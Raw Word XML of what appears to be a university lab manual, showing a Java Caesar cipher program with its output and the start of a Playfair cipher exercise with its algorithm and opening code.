        <w:t>caesarCipher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BE82493" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="4139" w:hanging="279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encode(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>enc,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offset)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>= offset % 26 + 26;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CFF5D7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoded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StringBuilder();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(char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6C171C29" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>enc.toCharArray())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DA02FAE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(Character.isLetter(i))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551F783" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(Character.isUpperCase(i))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4911324" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="1757"/>
      </w:pPr>
      <w:r>
        <w:t>encoded.append((char)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>('A'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offset)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rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>26));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C98088B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="14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F8CACBC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1757"/>
      </w:pPr>
      <w:r>
        <w:t>encoded.append((char)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>('a'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offset)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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4"/>
        </w:rPr>
        <w:t>26));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CBAC3F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:ind w:left="533" w:right="7898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6A9BC1C7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="245"/>
        <w:ind w:left="533" w:right="7852"/>
        <w:jc w:val="center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465E7C6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>encoded.append(i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04799A22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1ABFED" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="224"/>
        <w:ind w:left="1198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541BC11" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="242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05D8B145" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6515566B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>encoded.toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA1231B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06CCB3A8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7614D66C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="3449" w:hanging="279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decode(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>enc,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offset)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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 encode(enc, 26 - offset);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1872D563" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="3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0870FD07" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="241"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A7A2A6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="638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10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>throws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>java.lang.Exception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5"/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4717A17B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"Anna</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>University";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709ACA2A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="hyphen" w:pos="8550"/>
        </w:tabs>
        <w:spacing w:before="41"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.println("Simulating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Caesar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cipher\n</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4AAF54" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Input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msg);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>System.out.printf("Encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> Message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3535364F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="2222"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">: "); System.out.println(caesarCipher.encode(msg, 3)); System.out.printf("Decrypted Message : "); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.println(caesarCipher.decode(caesarCipher.encode(msg,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>3),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>3));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557133DD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="46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72DF83D8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3D1D827" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="248"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245E0C30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470653DF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="33"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Simulating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Caesar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CC61F6" w14:textId="77777777" w:rsidR="00A16F47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1340796" wp14:editId="1413B66D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130197</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1421765" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom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765">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1421638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B312F" id="Graphic 150" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:10.25pt;width:111.9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99FgIAAF4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X5yk6weMOMXQoMOA&#10;oivQFDsrshwbk0WNVGLn34+S4yTrbsN8EEjxiXrko7y471sr9gapAVfI2WQqhXEaysZtC/m2fvx0&#10;JwUF5UplwZlCHgzJ++XHD4vO52YONdjSoOAkjvLOF7IOwedZRro2raIJeOM4WAG2KrCL26xE1XH2&#10;1mbz6fQm6wBLj6ANEe+uhqBcpvxVZXT4XlVkgrCFZG4hrZjWTVyz5ULlW1S+bvSRhvoHFq1qHF96&#10;SrVSQYkdNn+lahuNQFCFiYY2g6pqtEk1cDWz6btqXmvlTaqFm0P+1Cb6f2n18/7Vv2CkTv4J9E/i&#10;jmSdp/wUiQ4dMX2FbcQycdGnLh5OXTR9EJo3Z5/ns9ubayk0x2bz29TkTOXjWb2j8NVAyqP2TxQG&#10;DcrRUvVo6d6NJrKSUUObNAxSsIYoBWu4GTT0KsRzkVw0RXcmEvda2Js1pGh4x5ypnaPWXaJiKTdX&#10;PMJjlYwdEGzEa7hXg5GuZvuyOOsSi6vZ9V2aDQLblI+NtZEG4XbzYFHsVZzM9MVCOMUfMI8UVorq&#10;AUcHis4RaN1RqkGdqNMGysMLio4HupD0a6fQSGG/OZ6YOP2jgaOxGQ0M9gHSG0k94lvX/Q+FXkQC&#10;hQws7jOM86jyUbdY/QkbTzr4sgtQNVHUNEYDo6PDQ5xKPD64+Eou/YQ6/xaWvwEAAP//AwBQSwME&#10;FAAGAAgAAAAhAI/5gnzeAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj81OwzAQhO9IvIO1SNyo&#10;nfSPhjgVQhSJXigtvW/jJYmI11Hstunb457gOLOj2W/y5WBbcaLeN441JCMFgrh0puFKw9du9fAI&#10;wgdkg61j0nAhD8vi9ibHzLgzf9JpGyoRS9hnqKEOocuk9GVNFv3IdcTx9u16iyHKvpKmx3Mst61M&#10;lZpJiw3HDzV29FJT+bM9Wg37t49Nut7hYrxSr9N3tU/oskm0vr8bnp9ABBrCXxiu+BEdish0cEc2&#10;XrRRTyZxS9CQqimIGBjP5gsQh6sxB1nk8v+C4hcAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4A&#10;AADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAA&#10;IQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAA&#10;IQBjKC99FgIAAF4EAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQCP+YJ83gAAAAkBAAAPAAAAAAAAAAAAAAAAAHAEAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAAewUAAAAA&#10;" path="m,l1421638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3D6ECF0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="140"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574C9378" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Input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Anna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14:paraId="2FC24C18" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="360" w:right="6253"/>
      </w:pPr>
      <w:r>
        <w:t>Encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15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Dqqd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Xqlyhuvlwb Decrypted Message : Anna University</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEE04F7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0541662E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F99C26" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="211"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE82270" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>RESULT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E0B37" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="426"/>
      </w:pPr>
      <w:r>
        <w:t>Thus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ceaser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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decryption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and the output verified successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C80FF5D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto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D19070" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="78"/>
        <w:ind w:left="535" w:right="532"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>26b).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Playfair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Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319F0A0E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D518E2F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7CC86568" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="1080"/>
      </w:pP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plain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cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE739CC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>substitution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A11A0D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7167D8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA9C4E0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="37" w:line="318" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359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message,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break the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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digrams (groups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letters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF2A581" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="318" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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example,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"HelloWorld"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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"HELLO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> WORLD".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C447DC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="320" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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digrams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substituted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7A05C8D1" w14:textId="77777777" w:rsidR="00A16F47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6" w:line="232" w:lineRule="auto"/>
        <w:ind w:right="1171"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Since</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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pairs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letters,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odd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 usually append an uncommon letter, such as "X", to complete the final digram.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF5EA8B" w14:textId="77777777" w:rsidR="00A16F47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8" w:line="235" w:lineRule="auto"/>
        <w:ind w:right="896"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The two letters of the digram are considered opposite corners of a rectangle in the key table. To perform the substitution, apply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 4 rules, in order, to each pair of letters in the plaintext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5733B0A2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="54"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750C2465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6DDD25F5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="38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playfairCipher.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58061E2A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="360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java.awt.Point;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC01C54" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="86"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E0BB202" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>playfairCipher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1B8DB5B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="638" w:right="5720"/>
      </w:pPr>
      <w:r>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16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char[][]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>charTable;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>private static Point[] positions;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC409BA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB5EBFA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="3670" w:hanging="279"/>
      </w:pPr>
      <w:r>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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prepareText(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>s,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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chgJtoI)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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= s.toUpperCase().replaceAll("[^A-Z]", "");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402AB3A1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>chgJtoI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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s.replace("J",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"I")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s.replace("Q",</w:t>
      </w:r>
